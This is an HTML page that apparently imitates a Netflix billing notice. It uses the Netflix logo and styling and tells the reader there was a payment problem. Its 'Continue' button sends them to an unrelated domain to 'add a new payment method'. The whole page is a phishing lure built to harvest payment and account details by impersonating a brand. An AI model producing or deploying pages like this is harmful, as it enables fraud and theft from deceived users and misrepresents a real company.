<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Landing Page Netflix</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: #000;
            color: #fff;
            font-family: Arial, sans-serif;
            text-align: center;
        }
        .container {
            margin: 0 20px;
        }
        .hero {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }
        .hero img {
            width: 200px;
            margin-bottom: 20px;
        }
        .hero h1 {
            font-size: 2em;
            margin-bottom: 20px;
        }
        .cta-button {
            background-color: #e50914;
            color: #fff;
            padding: 15px 30px;
            border: none;
            border-radius: 5px;
            font-size: 1em;
            cursor: pointer;
            text-decoration: none;
        }
        footer {
            background-color: #333;
            color: #fff;
            padding: 10px;
            font-size: 0.8em;
            position: absolute;
            bottom: 0;
            width: 100%;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="hero">
            <img src="https://images.ctfassets.net/4cd45et68cgf/4nBnsuPq03diC5eHXnQYx/d48a4664cdc48b6065b0be2d0c7bc388/Netflix-Logo.jpg" alt="Netflix Logo">
            <p>We regret to inform you that we encountered an issue processing your payment. To ensure uninterrupted access to our services, please make the necessary payment or add a new payment method at your earliest convenience.<p>
            <a href="https://bakuljembut.meinfranken.com/1237BLO" class="cta-button">Continue</a>
        </div>
    </div>
    
    <footer>
        <p>&copy; 2024 Netflix. </p>    </footer>
</body>
</html>
